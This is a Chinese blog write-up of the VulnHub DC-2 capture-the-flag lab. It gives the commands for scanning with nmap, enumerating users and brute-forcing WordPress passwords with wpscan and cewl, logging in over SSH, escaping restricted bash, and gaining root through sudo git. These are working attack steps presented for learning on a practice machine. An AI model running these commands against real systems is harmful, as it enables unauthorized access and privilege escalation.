DC2靶机渗透

已于 2023-08-04 17:16:59 修改
阅读量252 收藏 1
点赞数 1
文章标签: 安全
于 2023-08-04 17:09:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/q1234syr_/article/details/132097907
版权

DC2靶机渗透

今天我们来学习D2靶机渗透找出所有flag

开始进行靶机下载地址:
链接: https://www.vulnhub.com/entry/dc-2,311/
在靶机下载后,将模式改为NAT模式,重启靶机

第一步:靶机信息收集

// nmap查询存活主机
nmap -sP 192.168.109.0/24

发现靶机IP

查看开放端口

// nmap查询查询开放端口
nmap -sV -p- 192.168.109.136

在这里插入图片描述
打开网页,发现页面无法访问
在这里插入图片描述

第二步:查找flag1

尝试修改/etc/host 配置(kali设置)
在这里插入图片描述
尝试修改C:\Windows\System32\drivers\etc\hosts(windows设置)
在这里插入图片描述
成功访问页面,然后开启点点点,查找flag
在这里插入图片描述发现flag1
在这里插入图片描述

第三步:查找flag2(wpscan暴力破解)

嗯。。。给了个提示cewl (和字典有关,应该要破解密码用)先不管,还有用户名的提示,发现cms是wordpress 用wpscan扫描一下网页列出站点的用户名、账号

在这里插入图片描述

// wpscan扫描用户名
wpscan --url  dc-2 -e u

不理解wpscan放入小伙伴参考大佬写的链接
链接: https://zhuanlan.zhihu.com/p/149725645

–url|-u 要扫描的’WordPress站点
–enumerate | -e [option(s)] 枚举
u 枚举用户名(默认10个)
简单罗列出三个用户名和相关信息
在这里插入图片描述
将用户名写入user.txt文件,方便后续破解密码

根据flag1给的提示cewl生成字典dict.txt

// cewl生成dict.txt字典
cewl dc-2 -w dict.txt

cewl全指南命令链接如下
链接: https://www.freebuf.com/articles/network/190128.html
字典有了,用户名有了,开始破解密码

// wpscan暴力破解
 wpscan --url dc-2 -U user.txt -P dict.txt

-U:用户名文件
-P:字典文件
(有路径的要写上路径)
破解成功
在这里插入图片描述
去网页找找登录框。我喜欢用御剑,小伙伴们自行选择
在这里插入图片描述登录成功,点点点,发现flag2
在这里插入图片描述

第四步:查找flag3


根据提示还有另一种方法
嗯。。。记得之前扫描端口时候开通了ssh 现在有用户名密码,试试看可不可登录呢。。

在这里插入图片描述

// ssh 连接(加端口号)
ssh tom@192.168.109.136 -p 7744

成功用tom用户进入
在这里插入图片描述
成功发现flag3,用vi编辑打开查看

第五步:查找flag4(绕过rbash)

翻译过来意思好像是回到jerry用户上, 又看到有su提示尝试切换到jerry
在这里插入图片描述
看来需要绕过rbash,设置shell变量

// 绕过rbash
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ ls
flag3.txt   usr
tom@DC-2:~$ cat flag3.txt

发现flag3可以用cat命令查看了
在试着切换到jerry用户下

// An highlighted block
tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt

发现flag4
在这里插入图片描述

第五步:查找最终flag(git提权)

提示git 想到是否为git提权 root用户查询最终flag呢

// git提权
jerry@DC-2:~$ sudo git -p help config
:!/bin/sh

提权成功,查找最终flag

// 
# whoami
root
# ls
flag4.txt
# ls /root
final-flag.txt
# cat /root/final-flag.txt

获得最终的flag

完结 撒花✿✿ヽ(°▽°)ノ✿

q1234syr_
关注
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 5939
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
渗透测试靶机DC-2
my的博客
11-21 166
7744端口(ssh):使用hydra通过密码字典爆破ssh登录密码。切换root用户,在root目录下找到final-flag.txt。发现只能使用less、ls、scp、vi命令,无法su切换用户。切换Jerry用户家目录,发现flag4提示使用git提权。wpscan爆破用户密码,找到Jerry和tom的密码。flag2提示换一个切入点,80端口切入失败,80、7744端口开放,修改了ssh默认端口。ls发现flag3.txt,su提示切换用户。重新访问网站,下方找到flag1。
DC-2靶机进行渗透测试
zll___的博客
03-11 1106
DC-2靶机进行渗透测试
御剑扫描使用实例
Alashan12的博客
03-15 9084
使用御剑对http://159.75.16.25进行扫描,扫描出敏感文件,找到文件内的flag值 打开御剑扫描工具—>批量扫描后台—>添加 输入网址 选择模式、线程、文件类型等(双击选择) 点击开始扫描 找到两个敏感文件,打开两个地址查看 在http://159.75.16.25/index.php下找到flag。 ...
kali对CTF靶场进行渗透测试找flag
勤能补拙
05-09 2372
kali Linux做攻击机渗透测试CTF靶场找flag
Vulnhub | DC2靶机 渗透测试
菜鸡一枚
02-24 376
Vulnhub-DC系列第二个靶机,cewl & wpscan 构建字典、hydra爆破ssh、rbash绕过、git提权
DC2靶机渗透测试
Huangshanyoumu的博客
04-16 423
文章目录目标:收集 5 个 flag一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问靶机 80 端口,查看其使用了什么 cms2.目录扫描3.扫描用户名4.生成字典5.爆破密码6.使用账号密码登陆,在登陆 Jerry 时发现 flag27.使用 ssh1.使用 jerry 登陆,失败,得知该 ssh 密码与 wordpress 密码不一致2.使用 tom 登陆,成功8.rbash绕过9.git 提权 目标:收集 5 个 flag 一、信息收集 1.主机发现 已知靶机与攻击机在同一网段,扫描同网段 a
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1527
DC-2DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2665
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
【VulnHub靶机渗透】六:DC-2
野原新之助
04-25 753
靶机设定线索引导用户得到相关信息,存在弱口令和sudo权限配置不当等安全问题。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
DC系列之DC-2渗透测试
qq_45392044的博客
12-24 1155
其实正常情况下来讲,打开浏览器我们输入IP地址的时候,实际上地址栏不应该直接跳到dc-2,如果想正确的访问dc-2这样一个web应用,需要给一个本地的解析,否则访问不了!除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下kali虚拟机的host文件。我们可能在渗透测试或者是攻防演练的过程中,我们需要做一个信息收集,我们往往很多的信息都是放在我们网页里面的。写的,它是WordPress模板,WordPress是我们开源的cms的PHP编写的。
DC-1靶场渗透
一纸荒芜的博客
02-06 1414
本期讲解dc-1靶机渗透过程,多打靶机熟悉技能。
DC2-靶机
Au
08-19 1826
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
芯片软错误概率探究:基于汽车芯片安全设计视角
ANSILIC的博客
04-30 1329
本文深入剖析了芯片软错误概率问题,结合 AEC-Q100 与 IEC61508 标准,以 130 纳米工艺 1Mbit RAM 芯片为例阐述其软错误概率,探讨汽车芯片安全等级划分及软错误对汽车关键系统的影响,分析先进工艺下软错误变化趋势,并提出相应的应对策略,旨在为芯片在汽车等安全关键领域的应用提供理论参考与实践指导,保障电子系统可靠性。
基于STM32、HAL库的ATECC608B安全验证及加密芯片驱动程序设计
corlin6688的博客
04-29 220
注意:ATECC608B的I2C地址通常是0x60(7位地址)基于硬件的高安全性加密算法。ECC P-256加密引擎。真随机数生成器(TRNG)I²C接口(最高1MHz)低功耗设计,适合物联网应用。SHA-256哈希算法。16KB安全存储空间。
基于STM32、HAL库的DS2401P安全验证及加密芯片驱动程序设计
corlin6688的博客
04-28 306
1 |--DATA---------->| GPIO (配置为开漏输出)// 检测存在脉冲(设备应在60-240us内拉低总线)// 初始化DS2401P,使用GPIOB, PIN5。// 发送读取ROM命令 (0x33)// 微秒级延迟函数(需要根据系统时钟配置)// 释放总线(上拉电阻将拉高)工作温度范围:-40°C至+85°C。// 配置为开漏输出,无上拉。// 拉低总线至少480us。// 打印ROM信息。// 发送复位脉冲并检测存在脉冲。// 读取DS2401P的ROM。
企业 AD 域安全10大风险场景解析
运维有小邓
04-28 583
Active Directory(AD)作为大多数组织的信息管理中枢,在身份验证与访问控制中发挥着至关重要的作用。这也使其成为网络犯罪分子觊觎的目标,他们不断寻找漏洞以窃取关键数据。为了有效防御AD环境遭受攻击,了解常见的攻击手段以及制定全面的防护策略至关重要。本文将带你了解十大常见AD攻击类型,并介绍如何快速检测和防护。
内存安全的攻防战:工具链与语言特性的协同突围
最新发布
2501_90200491的博客
05-01 474
C++ 的内存安全攻坚战,本质上是工具链创新、语言特性进化、开发范式转变的系统性工程。当 Clang 的静态分析、SaferCPlusPlus 的安全抽象、GCC 的编译器优化形成合力,内存安全问题正从 "随机地雷" 转变为 "可控风险"。对于开发者而言,掌握 "静态分析早发现、安全库防患未然、编译器优化兜底" 的三层防御体系,才能在高性能与高安全的平衡中占据主动。
基于STM32、HAL库的AT88SC0104CA安全验证及加密芯片驱动程序设计
corlin6688的博客
04-29 88
/ 初始化AT88SC0104CA。// 配置Digital滤波器。// 简单检查I2C是否就绪。// 初始化失败处理。// 认证密码 (示例密码)// 数据不一致处理。// 配置Analog滤波器。// 检查密码修改是否成功。// 比较写入和读取的数据。// 检查写操作是否成功。// 写入数据到用户区1。// 从用户区1读取数据。
DC2元器件使用方法
03-14
### 关于DC2元器件的使用说明与教程 目前提供的引用材料并未直接提及 **DC2元器件** 的具体定义或其使用方法。然而,可以从其他相关领域推断可能涉及的知识点,并尝试提供一些通用指导。 #### DC2元器件概述 假设这里的“DC2”指的是某种直流(Direct Current, DC)相关的电子组件或模块,则可以根据常见的电子设计原则来推测其用途和操作方式。例如,在许多嵌入式系统开发中,类似于 STM32F103RB 这样的微控制器平台可能会配合某些特定功能的外设工作[^2]。如果 DC2 是一种功率转换设备、驱动电路或是信号调理单元,那么它的基本应用逻辑通常围绕以下几个方面展开: - 输入/输出接口配置; - 参数调节范围设定; - 工作模式切换控制等。 #### 可能的应用场景分析 基于上述提到的一些基础概念——比如二极管的功能特性描述[^1]以及滤波算法实现思路[^3]——我们可以进一步联想出如下几种典型情况适用于讨论对象"DC2": ##### 场景一:作为电源管理部件之一参与整体架构构建 在这种情形下,“DC2”也许代表某类降压变换器(Buck Converter)或者升压变换器(Boost Converter),负责将输入电压调整至适合下游负载需求水平的同时保持效率最优化状态运行。此时需要注意的关键参数包括但不限于开关频率(fsw),占空比(Duty Cycle),反馈环路补偿机制等等因素影响下的动态响应表现如何满足实际项目指标要求。 ```c // 示例代码片段展示简易PWM生成过程 void generate_pwm(int duty_cycle){ TIM_TimeBaseInitTypeDef TIM_InitStruct; RCC_APB1PeriphClockCmd(RCC_APB1Periph_TIM4, ENABLE); TIM_InitStruct.TIM_Period = 999; TIM_InitStruct.TIM_Prescaler = 71; TIM_InitStruct.TIM_ClockDivision = TIM_CKD_DIV1; TIM_InitStruct.TIM_CounterMode = TIM_CounterMode_Up; TIM_TimeBaseInit(TIM4,&TIM_InitStruct); TIM_SetCompare1(TIM4,duty_cycle*10); TIM_Cmd(TIM4,ENABLE); } ``` ##### 场景二:充当传感器采集前端处理节点角色 另一种可能性在于它被用来执行诸如光电隔离放大之类的任务以便更好地获取外部环境变化信息进而作出相应决策动作。这里可以联想到之前有关光照强度监测阈值设置部分所阐述的内容[^4],即通过合理安排检测周期及时长规避外界干扰源造成错误触发现象发生几率提升测量精度可靠性程度。 --- 尽管如此,由于缺乏更确切的产品手册文档支持,以上仅属于理论层面探讨范畴并不能完全覆盖实际情况复杂度差异之处。因此强烈建议查阅官方发布的权威资料获得更为详尽准确的信息来源依据做出最终判断结论!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值